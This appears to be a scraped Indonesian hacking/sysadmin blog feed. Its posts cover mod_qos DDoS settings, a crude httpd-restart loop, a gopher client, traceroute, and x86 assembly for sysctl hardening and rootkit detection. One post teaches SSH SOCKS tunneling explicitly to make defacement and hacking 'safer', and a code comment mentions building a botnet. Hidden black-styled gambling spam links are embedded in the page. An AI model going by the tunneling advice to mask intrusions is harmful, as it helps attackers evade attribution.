-I/usr/local/apache/include -I/usr/local/apache/include -c -o mod_qos.lo mod_qos.c && touch mod_qos.slo<br />/usr/local/apache/build/libtool --silent --mode=link gcc -o mod_qos.la -rpath /usr/local/apache/modules -module -avoid-version mod_qos.lo<br />/usr/local/apache/build/instdso.sh SH_LIBTOOL='/usr/local/apache/build/libtool' mod_qos.la /usr/local/apache/modules<br />/usr/local/apache/build/libtool --mode=install cp mod_qos.la /usr/local/apache/modules/<br />cp .libs/mod_qos.so /usr/local/apache/modules/mod_qos.so<br />cp .libs/mod_qos.lai /usr/local/apache/modules/mod_qos.la<br />cp .libs/mod_qos.a /usr/local/apache/modules/mod_qos.a<br />chmod 644 /usr/local/apache/modules/mod_qos.a<br />ranlib /usr/local/apache/modules/mod_qos.a<br />PATH="$PATH:/sbin" ldconfig -n /usr/local/apache/modules<br />----------------------------------------------------------------------<br />Libraries have been installed in:<br /> /usr/local/apache/modules<br /><br />If you ever happen to want to link against installed libraries<br />in a given directory, LIBDIR, you must either use libtool, and<br />specify the full pathname of the library, or use the `-LLIBDIR'<br />flag during linking and do at least one of the following:<br /> - add LIBDIR to the `LD_LIBRARY_PATH' environment variable<br /> during execution<br /> - add LIBDIR to the `LD_RUN_PATH' environment variable<br /> during linking<br /> - use the `-Wl,--rpath -Wl,LIBDIR' linker flag<br /> - have your system administrator add LIBDIR to `/etc/ld.so.conf'<br /><br />See any operating system documentation about shared libraries for<br />more information, such as the ld(1) and ld.so(8) manual pages.<br />----------------------------------------------------------------------<br />chmod 755 /usr/local/apache/modules/mod_qos.so<br />root@server [~/anti_ddos/mod_qos-10.2/apache2]# <br />=================<br /><br /><br />ok selanjutnya kita teh liat apa sudah ada modulenya:<br />===========<br />root@server [/usr/local/apache/modules]# ls | grep mod_qos<br />mod_qos.so*<br />===========<br /><br /><br />lalu teh tinggal bikin qos.conf di direktori /usr/local/apache/modules :<br />=====<br />## QoS Settings<br /><br /># handles connections from up to 100000 different IPs<br />QS_ClientEntries 100000<br /># will allow only 50 connections per IP<br />QS_SrvMaxConnPerIP 50<br /># maximum number of active TCP connections is limited to 256<br />MaxClients 256<br /># disables keep-alive when 70% of the TCP connections are occupied:<br />QS_SrvMaxConnClose 180<br /># minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):<br />QS_SrvMinDataRate 150 1200<br /># and limit request header and body (carefull, that limits uploads and post requests too):<br /># LimitRequestFields 30<br /># QS_LimitRequestBody 102400<br />===================<br /><br /> cekidot jika dah siap:<br />============================= <br />root@server [/usr/local/apache/modules]# ls | grep qos<br />mod_qos.so*<br />qos.conf<br />qos.load<br />================ <br /><br />selanjutnya sangaut sangaut gampeeeuuung tinggeul tambahin sikit ja kode buat load module di httpd.conf:<br />==========<br />LoadModule qos_module /usr/local/apache/modules/mod_qos.so<br />===========<br /><br />sesuaikeun dengan path mod qos ente<br /><br /><br />selanjutnya restart httpd:<br />====<br />root@server [/usr/local/apache/modules]# /etc/init.d/httpd restart<br />=================================================<br /><br />dan selesai<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-4542045839203359742?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-87020606261169132972012-02-27T00:43:00.001-08:002012-02-27T00:51:37.314-08:003 baris kode buatan syadmin pemalas untuk ngerjain orangbagi anda2 sysadmin yang make apache dan males dan mao bersantai2 , males nginstall aneka mod proteksi untuk proteksi ddos, berikut ini adaeluh 3 baeries koeeede buat ngerjaaaaieeen orang yg lagi ddos:<br /><br />cekidot i love the movit movit 3 baris kode ala sysadmin pemalas buat sante2: <br />====<br />defined(my $pid = fork); if ($pid) { exit; } <br />for(;;) { system("/etc/init.d/./httpd stop"); sleep 1; system("/etc/init.d/./httpd start"); system("/etc/init.d/./httpd start"); sleep 25; }<br />===================<br /><br />keteeearranegeeeeuun:<br />baris partama teh:<br />defined(my $pid = fork); if ($pid) { exit; } <br /><br /><br /><br />baris kadua:<br />for(;;) { system("/etc/init.d/./httpd stop"); sleep 1; system("/etc/init.d/./httpd<br /><br />bariees ketitttgueaaa <br />start"); system("/etc/init.d/./httpd start"); sleep 25; }<br /><br /><br /><br /><br />gaaampeeeung bet cuy ga pake mod apa2 ga pake firewooll ga pake eeelllkaaaaeeemmm dah bisa isenggg1n orraaang<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-8702060626116913297?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-53972137268092181162012-02-26T12:58:00.003-08:002012-02-26T12:58:57.014-08:00sekilas tentang model memori dengan segmen dan offset<h6 class="uiStreamMessage"><span class="messageBody">pada model memori dg segmen dan offset misal: 1A42:38A7,<br />1A42 adl alamat segmen dan 38a7 adl alamat offset, alamat absolutnya adalah : 1dcc7 didapat dari (1A42 * 10)+38a7=1dcc7</span></h6><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-5397213726809218116?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-6190723593937893762012-02-26T12:58:00.000-08:002012-02-26T12:58:07.046-08:00sekilas tentang boot sector<h6 class="uiStreamMessage"><span class="messageBody">tiap disk memiliki sec,cyl dan hds, blok 0=gabungan dari sector 1, cylinder 0 dan head 0 (1,0,0), blok 1 = gabungan dari sector 2, cylinder 0 dan head 0 (2,0,0) , saat sistem reset bios melakukan pengecekan pada blok 0 (1,0,0) dengan alamat memori absolut 7C000</span></h6><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-619072359393789376?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-8440056106134864572012-02-25T12:42:00.000-08:002012-02-25T12:42:43.904-08:00[Cara Ngakses Gopher dari Console Linux][Cara Ngakses Gopher dari Console Linux]<br /><br />by: ev1lut10n<br /><br />Dedicated to :"Manusia Biasa Team"<br />thanks to: Manusia Biasa Team, Devilzc0de Crew and Antijasakom<br />kembali lagi dengan permainan 2 kita kali ini kita akan mencoba mengakses gopher dari konsole linux kite.<br />gimana caranya ? dengan menggunakan gopher client.<br /><br />Apa sih gopher itu? gopher adalah protokol yang dikembangkan sekitar tahun 91 an sbg alternatif untuk http protokol.<br /><br />contoh gopher:<br />gopher://sdf.org/1/users/wisdomc0<br /><br />cara mengakses gopher bisa dengan telnet ke server gopher di port 70 atau yang paling enak pake gopher client<br /><br />ketikkan dari console:<br />====<br />sudo apt-get install gopher<br />====<br /><br />jika sudah berhasil cekidot:<br />======================================<br />root@ev1lut10n-Vostro1310:~/backupan_g# gopher -h<br />gopher: invalid option -- 'h'<br />Usage: gopher [-sSbDr] [-T type] [-p path] [-t title] [hostname port]+<br /> -s secure mode, users without own account<br /> -S secure mode, users with own account<br /> -p path specify path to initial item<br /> -T type Type of initial item<br /> -i Search argument (for -T 7)<br /> -b Bookmarks first<br /> -r Remote user<br /> -D Debug mode<br />root@ev1lut10n-Vostro1310:~/backupan_g# gopher ?<br />Welcome to the wonderful world of Gopher!<br /><br />Gopher has limitations on its use and comes without<br />a warranty. Please refer to the file 'Copyright' included<br />in the distribution.<br /><br />Internet Gopher Information Client 3.0 patch12 (FurryTerror)<br />Copyright (C) 1991-2000 by the Regents of the University of Minnesota<br />Copyright (C) 2000-2005 John Goerzen and the gopher developers<br /><br />Press RETURN to continue<br />=====================================<br /><br /><br /><br />nah jika pake gopher client yang dari konsole<br />tinggal ketik dari konsole :<br /><br />gopher gopher://alamat_ip_atau_hostname_server_gopher<br /><br />misalnya ketikkan:<br />============<br />gopher gopher://sdf.org/1/users/wisdomc0<br />============<br /><br />jika sudah berhasil kita bisa mengakses gophernya seperti gambar di bawah ini:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-zp6mkXsnqoQ/T0lHnrAXBZI/AAAAAAAAA6Y/7_Awcetly3o/s1600/gopher.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-zp6mkXsnqoQ/T0lHnrAXBZI/AAAAAAAAA6Y/7_Awcetly3o/s1600/gopher.jpg" width="600" /></a></div><br /><br /><style>#sbobet{color:black}</style><br /><br /><div style="background-color: black;"><br /><a href="http://royalbet77.com/" id="sbobet" title="agen bola">agen bola sbobet</a><br /><a href="http://royalbet77.org/" id="sbobet" title="agen bola">agen bola sbobet</a><br /><a href="http://royalbet77.me/" id="sbobet" title="agen bola">agen bola sbobet</a><br /><a href="http://royalbet77.net/" id="sbobet" title="agen bola">agen bola sbobet</a><br /><a href="http://royalbet77.in/" id="sbobet" title="agen bola">agen bola sbobet</a><br /><a href="http://royalbet77.info/" id="sbobet" title="agen bola">agen bola sbobet</a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-844005610613486457?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-61460592477673888092012-02-25T12:08:00.000-08:002012-02-25T12:08:15.108-08:00Mengetahui Berapa Banyak Router dari Server kita ke google.comMengetahui Berapa Banyak Router dari Server kita ke google.com<br /><br />by: ev1lut10n<br /><br />artikel ini khusus dipersembahkan untuk: "Manusia Biasa Team"<br />dedicated for : "Manusia Biasa Team"<br />thanks to all: Manusia Biasa Team , devilzc0de , antijasakom <br /><br />1 hop dalam jaringan bisa kita artikeun sebagai 1 router yang kita bablasin. tool depault di linux untuk kita bisa ngeliatin router2 misala<br />dari server kita ke google, kita teh bisa pake tool yang namanya "traceroute"<br /><br />contoh di mari:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Sylvbc2EmBQ/T0k_luBRUDI/AAAAAAAAA6Q/cwgF4qK1-J8/s1600/router.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Sylvbc2EmBQ/T0k_luBRUDI/AAAAAAAAA6Q/cwgF4qK1-J8/s1600/router.jpg" width="820" /></a></div><br /><br />nah di atas kita bisa liat sabaraha teh router2 yang udah dilewatin paket kita<br /><br />==========================<br />sh-3.2# traceroute google.com<br />traceroute to google.com (74.125.230.238), 30 hops max, 40 byte packets<br /> 1 81.15.18.254 (81.15.18.254) 0.542 ms 0.783 ms 1.100 ms<br /> 2 193-4-250-217.static.metronet.is (193.4.250.217) 2.071 ms 2.290 ms 2.420 ms<br /> 3 te1-1-E200-01-London.c.is (217.151.190.90) 41.287 ms 41.514 ms 41.793 ms<br /> 4 74.125.50.161 (74.125.50.161) 44.766 ms 44.894 ms 45.271 ms<br /> 5 209.85.252.76 (209.85.252.76) 46.050 ms 209.85.255.175 (209.85.255.175) 46.578 ms 209.85.252.76 (209.85.252.76) 46.404 ms<br /> 6 209.85.253.196 (209.85.253.196) 46.285 ms 209.85.253.90 (209.85.253.90) 42.504 ms 40.204 ms<br /> 7 209.85.242.79 (209.85.242.79) 53.939 ms 53.198 ms 53.275 ms<br /> 8 209.85.242.51 (209.85.242.51) 49.556 ms 49.786 ms 50.106 ms<br /> 9 par08s10-in-f14.1e100.net (74.125.230.238) 52.487 ms 52.607 ms 52.837 ms<br />============================<br /><br />cekidot di hop pertama teh gateway routernya kita:<br /><br /> 1 81.15.18.254<br /><br />hop selanjutnya ke router dg alamat ip:<br /><br />2. 193.4.250.217<br /><br /><br />dst sampe akhirnya <br /><br />sampe di tujuan kita servernya om google:<br />===================<br />par08s10-in-f14.1e100.net (74.125.230.238) <br />==================<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6146059247767388809?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-66467880316837278672012-02-25T06:10:00.000-08:002012-02-25T06:10:12.935-08:00SSH tunneling di linux (socks) untuk proksi biar kegiatan deface2 lebih amanSSH tunneling di linux (socks) untuk proksi biar kegiatan deface2 lebih aman<br /><br /><br />oleh: ev1lut10n<br /><br />especially dedicated for : "Manusia Biasa Team"<br />https://www.facebook.com/#!/groups/newmbt/<br />thanks: Raka, Doza, and all Manusia Biasa Team Members <br />and also thanks to: All Devilzc0de Crews and da Members<br /><br /><br />misi agan2 ane cupu baru nyoba2 nulis artikel tentang ssh tunneling di linux.<br /><br />dengan ssh tunneling maka kita bisa menggunakan ssh server yang kita owned untuk socks (secure socket) <br />saat kita melakukan aksi deface2 an dan hacking.<br /><br />tutorial ini ditujukan untuk pemula yang ingin belajar menggunakan ssh tunneling dari linux.<br />bagi yang udah tau tidak disarankan membaca tulisan ini <br /><br />untuk melakukan ssh tunneling harus memiliki akun ssh yang permit tunnel<br />misal pada open ssh yang tidak permit tunnel di server:<br />#echo “PermitTunnel yes” >> /etc/ssh/sshd_config<br />#/etc/init.d/<br /><br />lalu restart openssh:<br />============================<br />root@server [~]# /etc/init.d/sshd restart<br />Stopping sshd: [ OK ]<br />Starting sshd: [ OK ]<br />=============================<br /><br /><br />misal kita akan melakukan tunneling dengan memanfaatkan akun ssh , ketikkan:<br /><br />ssh -D port_lokal_untuk_tunneling -l akun_login_ssh ip_atau_hostname_ssh_server <br /><br />misal kita akan pakai port lokal 3339 utk tunneling:<br /><br />misal (hanya contoh):<br />=======================================<br />ssh -D 3339 mysql@serverbuattunnel.org<br />mysql@lspr.edu's password: <br />Have a lot of fun...<br />sh-3.1# <br />====================================<br /><br />jika berhasil maka akan listen di lokal port 3339:<br />========<br />root@ev1lut10n-Vostro1310:~/backupan_g# netstat -a | grep 3339<br />tcp 0 0 localhost.localdom:3339 *:* LISTEN <br />tcp6 0 0 ev1lut10n-Vostro13:3339 [::]:* LISTEN <br />========<br /><br />selanjutnya untuk tunneling buka firefox dan pilih menu:<br />edit -> preferences -> advanced -> network -> setting -> pilih manual proxy configuration <br />lalu isikan sock v 5 dengan alamat localhost dan port 3339 (port yang tadi)<br />(untuk yang di windows menunya beda)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-dEfrmaH03i4/T0jrnT-VngI/AAAAAAAAA6I/5_SQ-KBJnCA/s1600/sock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-dEfrmaH03i4/T0jrnT-VngI/AAAAAAAAA6I/5_SQ-KBJnCA/s1600/sock.jpg" width="620" /></a></div><br /><br />jika berhasil maka silahkan buka web ini dengan firefox agan2<br /><br />http://whatismyip.org/<br /><br />maka alamat ip agan 2 akan berganti menjadi alamat ip server yg agan pake buat tunneling.<br /><br />sekian dan terima kasih<br /><br />regards<br />ev1lut10n<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6646788031683727867?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-53645811241049575592012-02-21T16:02:00.003-08:002012-02-21T16:15:50.633-08:00merikenin.asm - Merikenin TCP/IP Stack Hardening and Basic Rootkit Checker version 1.0<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Egeagyp2xxE/T0Qvz4bkG-I/AAAAAAAAA6A/kAMisKUaP88/s1600/jasaplus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Egeagyp2xxE/T0Qvz4bkG-I/AAAAAAAAA6A/kAMisKUaP88/s1600/jasaplus.jpg" width="620" /></a></div><br />;gopher://sdf.org/0/users/wisdomc0/code_asm/merikenin.asm<br /><br />;merikenin.asm - Merikenin TCP/IP Stack Hardening and Basic Rootkit Checker ;version 1.0 <br />;The programmer : ev1lut10n <br />;dedicated to Merikenin <br />;thanks to : X-hack,Danzel,Superman,Cakill, nofia fitri,Dedy, Chaer, Paulus ;gandung,Tian,Zendy,Hendra, Wenkhairu and all my bro and friends <br />;current big project : "Making a linux botnet and windows botnet that can work ;synergy (my own idea)" <br />;website : http://www.jasaplus.com <br />;gopher://sdf.org/1/users/wisdomc0 <br />section .bss <br />pilih_on_heap resb 6 <br />file: resd 1 <br />section .data <br />t00lname db ".::Merikenin TCP/IP Stack Hardening and Basic Rootkit Checker::.",13,10 <br />pjg_t00lname equ $-t00lname <br />c0d3r db "c0der : ev1lut10n",13,10 <br />pjg_c0d3r equ $-c0d3r <br />g0tr00t db "we got root access",13,10 <br />pjg_g0tr00t equ $-g0tr00t <br />n0tr00t db "we dont have root priv,sorry y0u can not use this t00l baby",13,10 <br />pjg_n0tr00t equ $-n0tr00t <br />;define jynx rootkit checker <br />jynx_ld_preload_poison_string db "ld_poison.so",0x00 <br />jynx_ld_preload_so_path db "/etc/ld.so.preload",0x00 <br />;define haxpath checker for kbeast lkm <br />_H4X_PATH_ db "/usr/_h4x_",0x00 <br />;software menu <br />m3nu1 db "sys1 - Enable source validation by reversed path ",13,10 <br />pjg_m3nu1 equ $-m3nu1 <br />m3nu2 db "sys2 - Enable TCP Syn Cookies (protection against syn attack)",13,10 <br />pjg_m3nu2 equ $-m3nu2 <br />m3nu3 db "sys3 - Ignore ICMP Echo Broadcast Requests",13,10 <br />pjg_m3nu3 equ $-m3nu3 <br />b0nus db "Some bonuses functions :" <br />pjg_b0nus equ $-b0nus <br />m3nu5 db "rkc1 - Checking Possible Jynx LD_Preload Rootkit",13,10 <br />pjg_m3nu5 equ $-m3nu5 <br />m3nu6 db "rkc2 - Checking Possible Kernel Beast",13,10 <br />pjg_m3nu6 equ $-m3nu6 <br />m3nu7 db "quit - quit this t00l",13,10 <br />pjg_m3nu7 equ $-m3nu7 <br />;eof software menu <br />c0ns0l3 db "cmd:" <br />pjg_c0ns0l3 equ $-c0ns0l3 <br />pilih db "%s", 0 <br />teks_continue db "/etc/ld.so.preload found beware !",13,10 <br />pjg_teks_continue equ $-teks_continue <br />teks_dont_continue db "No /etc/ld.so.preload found ! Seems like clean",13,10 <br />pjg_teks_dont_continue equ $-teks_dont_continue <br /><br />teks_continuex db "/usr/_h4x_ found ! You're being infected",13,10 <br />pjg_teks_continuex equ $-teks_continuex <br />teks_dont_continuex db "No /usr/_h4x_ found ! Seems like clean",13,10 <br />pjg_teks_dont_continuex equ $-teks_dont_continuex <br /><br />section .text <br />global _start <br />_start: <br />;jmp _merikenin_sysc <br />jmp long _merikenin_start <br /><br />;starting jynx rootkit checking routine <br />_merikenin_jynx: <br />push ebp <br />mov ebp,esp <br /> <br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br /> <br />call the_cek <br />mov ebx,jynx_ld_preload_so_path <br />int 0x80 <br /><br />mov dword [file],eax <br />cmp dword [file],0 <br />jle dont_continue <br />je continue <br /><br />mov esp,ebp <br />pop ebp <br /><br />continue: <br />push ebp <br />mov ebp,esp <br /> <br />mov ecx,teks_continue <br />mov edx,pjg_teks_continue <br />call _merikenin_writeln <br />jmp long _merikenin_out <br />mov esp,ebp <br />pop ebp <br /><br />dont_continue: <br />push ebp <br />mov ebp,esp <br /><br />mov ecx,teks_dont_continue <br />mov edx,pjg_teks_dont_continue <br />call _merikenin_writeln <br />jmp long _merikenin_out <br />mov esp,ebp <br />pop ebp <br /><br />the_cek: <br />push ebp <br />mov ebp,esp <br />mov eax,5 <br />xor ecx,0 <br />mov edx,0x100 <br />mov esp,ebp <br />pop ebp <br />ret <br /><br />;eof jynx rootkit checking <br /><br />;start ipsecs kbeast checking <br />_merikenin_ipsecs: <br />push ebp <br />mov ebp,esp <br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br />call the_cek2 <br />mov ebx,_H4X_PATH_ <br />int 0x80 <br />mov dword [file],eax <br />cmp dword [file],0 <br />jle dont_continuex <br />je continuex <br /><br />mov esp,ebp <br />pop ebp <br /><br />continuex: <br />push ebp <br />mov ebp,esp <br />mov ecx,teks_continuex <br />mov edx,pjg_teks_continuex <br />call _merikenin_writeln <br />jmp long _merikenin_out <br />mov esp,ebp <br />pop ebp <br /><br />dont_continuex: <br />push ebp <br />mov ebp,esp <br />mov ecx,teks_dont_continuex <br />mov edx,pjg_teks_dont_continuex <br />call _merikenin_writeln <br />jmp long _merikenin_out <br />mov esp,ebp <br />pop ebp <br /><br />the_cek2: <br />push ebp <br />mov ebp,esp <br />mov eax,5 <br />xor ecx,0 <br />mov edx,0x100 <br />mov esp,ebp <br />pop ebp <br />ret <br /><br />;eof ipsecs kbeast checking <br /><br /><br />;getpriv.s <br />_merikenin_pr3p4r3_0pt: <br /> push ebx <br /> push esi <br /> push edi <br /> <br />_merikenin_get_privilege: <br /> push ebp <br /> mov ebp, esp <br /> mov eax, 18h <br /> push eax <br /> int 80h <br /> <br /> cmp al,0 <br /> jz _merikenin_g0tr00t <br /> jmp _merikenin_n0tr00t <br /> mov esp, ebp <br /> pop ebp <br /> <br />;eof getpriv.s <br />_merikenin_g0tr00t: <br /> push ebp <br /> mov ebp, esp <br /> mov ecx,g0tr00t <br /> mov edx,pjg_g0tr00t <br /> call _merikenin_writeln <br /> mov esp, ebp <br /> pop ebp <br /> jmp _merikenin_jmpmania <br /> <br />_merikenin_n0tr00t: <br /> push ebp <br /> mov ebp,esp <br /> mov ecx,n0tr00t <br /> mov edx,pjg_n0tr00t <br /> call _merikenin_writeln <br /> mov esp,ebp <br /> pop ebp <br /> jmp _merikenin_out <br /><br />_merikenin_writeln: <br /> push ebp <br /> mov ebp,esp <br /> mov ebx,0x1 <br /> mov eax,0x4 <br /> int 80h <br /> ;mov ah,09h <br /> ;mov dx,offset str1ng <br /> ;int 21h <br /> mov esp,ebp <br /> pop ebp <br /> ret <br /><br /><br />_merikenin_banner: <br />push ebp <br />mov ebp,esp <br />mov ecx,t00lname <br />mov edx,pjg_t00lname <br />call _merikenin_writeln <br /><br />mov ecx,c0d3r <br />mov edx,pjg_c0d3r <br />call _merikenin_writeln <br />mov esp,ebp <br />pop ebp <br />ret <br /><br /><br />_merikenin_do: <br /> mov eax, 11 <br /> int 80h <br /> ret <br /><br />_merikenin_net.ipv4.icmp_echo_ignore_broadcasts_1: <br /> push ebp <br /> mov ebp, esp <br /> <br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br /> <br /> push 0xb <br /> pop eax <br /> push edx <br /> <br /> push 0x313d ;=1 <br /> push 0x73747361 ;stsa <br /> push 0x6364616f ;cdao <br /> push 0x72625f65 ;rb_e <br /> push 0x726f6e67 ;rong <br /> push 0x695f6f68 ;i_oh <br /> push 0x63655f70 ;ce_p <br /> push 0x6d63692e ;mci. <br /> push 0x34767069 ;4vpi <br /> push 0x2e74656e ; .ten <br /> <br /> mov esi,esp <br /> push edx <br /> <br /> push 0x772d ;w- <br /> mov ecx,esp <br /><br /> push edx <br /> push 0x6c746373 <br /> push 0x79732f6e <br /> push 0x6962732f <br /> mov ebx,esp <br /><br /> push edx <br /> push esi <br /> push ecx <br /> push ebx <br /> mov ecx,esp <br /> int 80h <br /> <br /> <br /> <br /> mov esp,ebp <br /> pop ebp <br /> jmp long _merikenin_out <br /><br />_merikenin_net.ipv4.tcp_syncookies_1: <br /> push ebp <br /> mov ebp, esp <br /> <br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br /> <br /> push 0xb <br /> pop eax <br /> push edx <br /> <br /> push 0x2031 ;1 <br /> push 0x3d736569 ;=sei <br /> push 0x6b6f6f63 ;kooc <br /> push 0x6e79735f ;nys_ <br /> push 0x7063742e ;pct. <br /> push 0x34767069 ;4vpi <br /> push 0x2e74656e ; .ten <br /> <br /> mov esi,esp <br /> push edx <br /> <br /> push 0x772d ;w- <br /> mov ecx,esp <br /><br /> push edx <br /> push 0x6c746373 <br /> push 0x79732f6e <br /> push 0x6962732f <br /> mov ebx,esp <br /><br /> push edx <br /> push esi <br /> push ecx <br /> push ebx <br /> mov ecx,esp <br /> int 80h <br /> <br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br /> <br /> mov esp,ebp <br /> pop ebp <br /> jmp long _merikenin_out <br /><br />_merikenin_sysctl_w_net.ipv4.conf.all.rp_filter_1: <br /> push ebp <br /> mov ebp, esp <br /> <br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br /> <br /> push 0xb <br /> pop eax <br /> push edx <br /> <br /> push 0x2031 ;1 <br /> push 0x3d726574 ;=ret <br /> push 0x6c69665f ;lif_ <br /> push 0x70722e6c ;pr.l <br /> push 0x6c612e66 ;la.f <br /> push 0x6e6f632e ;noc. <br /> push 0x34767069 ;4vpi <br /> push 0x2e74656e ; .ten <br /> <br /> <br /> mov esi,esp <br /> push edx <br /> <br /> push 0x772d ;w- <br /> mov ecx,esp <br /><br /> push edx <br /> push 0x6c746373 <br /> push 0x79732f6e <br /> push 0x6962732f <br /> mov ebx,esp <br /><br /> push edx <br /> push esi <br /> push ecx <br /> push ebx <br /> mov ecx,esp <br /> int 80h <br /> <br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br /> mov esp,ebp <br /> pop ebp <br /> jmp long _merikenin_out <br /> <br /><br />_merikenin_jmpmania: <br /> push ebp <br /> mov ebp, esp <br /> jmp _merikenin_start2 <br /> mov esp,ebp <br /> pop ebp <br /><br />_merikenin_start: <br />push ebp <br />mov ebp,esp <br />call (_merikenin_banner) <br />jmp _merikenin_pr3p4r3_0pt <br />mov esp,ebp <br />pop ebp <br /><br /><br />_merikenin_start2: <br /> push ebp <br /> mov ebp, esp <br /> <br /> <br /> mov ecx,m3nu1 <br /> mov edx,pjg_m3nu1 <br /> call (_merikenin_writeln) <br /> <br /> mov ecx,m3nu2 <br /> mov edx,pjg_m3nu2 <br /> call (_merikenin_writeln) <br /> <br /> mov ecx,m3nu3 <br /> mov edx,pjg_m3nu3 <br /> call (_merikenin_writeln) <br /> <br /> <br /> <br /> mov ecx,m3nu5 <br /> mov edx,pjg_m3nu5 <br /> call (_merikenin_writeln) <br /> <br /> mov ecx,m3nu6 <br /> mov edx,pjg_m3nu6 <br /> call (_merikenin_writeln) <br /> <br /> <br /> <br /> mov ecx,c0ns0l3 <br /> mov edx,pjg_c0ns0l3 <br /> call (_merikenin_writeln) <br /> <br /> mov eax,3 <br /> mov ebx,0 <br /> mov ecx,pilih_on_heap <br /> int 80h <br /><br /> push eax <br /> <br /> <br /> xor eax,eax <br /> mov eax, dword [pilih_on_heap] <br /> <br /> cmp eax,'sys1' <br /> je _merikenin_sysctl_w_net.ipv4.conf.all.rp_filter_1 <br /> <br /> cmp eax,'sys2' <br /> je _merikenin_net.ipv4.tcp_syncookies_1 <br /> <br /> cmp eax,'sys3' <br /> je _merikenin_net.ipv4.icmp_echo_ignore_broadcasts_1 <br /><br /> <br /> cmp eax,'rkc1' <br /> je _merikenin_jynx <br /><br /> cmp eax,'rkc2' <br /> je _merikenin_ipsecs <br /> <br /> jmp _merikenin_out <br /> mov esp,ebp <br /> pop ebp <br /><br />_merikenin_out: <br />nop <br />mov eax,0x01 <br />int 80h<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-5364581124104957559?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-44617442135790235802012-02-21T12:19:00.001-08:002012-02-21T12:19:59.242-08:00sysctl -w net.ipv4.conf.all.rp_filter=1====<br />;sysctl -w net.ipv4.conf.all.rp_filter=1 <br />;by:ev1lut10n<br />;dedicated to: Merikenin<br />;thanks to all my bro and friends<br />section .data<br />c0d3r db "sysctl -w net.ipv4.conf.all.rp_filter=1 , c0ded by ev1lut10n",13,10<br />pjg_c0d3r equ $-c0d3r <br /><br />section .text<br />global _start:<br />_start:<br /> jmp _merikenin_start<br /> <br />_merikenin_writeln:<br /> push ebp <br /> mov ebp,esp<br /> mov ebx,0x1<br /> mov eax,0x4<br /> int 80h<br /> ;mov ah,09h<br /> ;mov dx,offset str1ng<br /> ;int 21h<br /> mov esp,ebp <br /> pop ebp<br /> ret<br /> <br />_merikenin_start: <br /> push ebp<br /> mov ebp, esp<br /> <br /> mov ecx,c0d3r<br /> mov edx,pjg_c0d3r<br /> call _merikenin_writeln<br /><br /> xor eax,eax <br /> xor ebx,ebx <br /> xor ecx,ecx <br /> xor edx,edx <br /> <br /> push 0xb<br /> pop eax<br /> push edx<br /> <br /> push 0x2031 ;1<br /> push 0x3d726574 ;=ret<br /> push 0x6c69665f ;lif_<br /> push 0x70722e6c ;pr.l<br /> push 0x6c612e66 ;la.f<br /> push 0x6e6f632e ;noc.<br /> push 0x34767069 ;4vpi<br /> push 0x2e74656e ; .ten<br /> <br /> <br /> mov esi,esp<br /> push edx<br /> <br /> push 0x772d ;w-<br /> mov ecx,esp<br /><br /> push edx<br /> push 0x6c746373<br /> push 0x79732f6e <br /> push 0x6962732f<br /> mov ebx,esp<br /><br /> push edx<br /> push esi<br /> push ecx<br /> push ebx<br /> mov ecx,esp<br /> int 80h<br /><br /> mov esp,ebp<br /> pop ebp<br /> <br />_getout:<br /> mov eax,0x1<br /> int 80h<br />======<div class="blogger-post-footer"><img width='1' height='1' 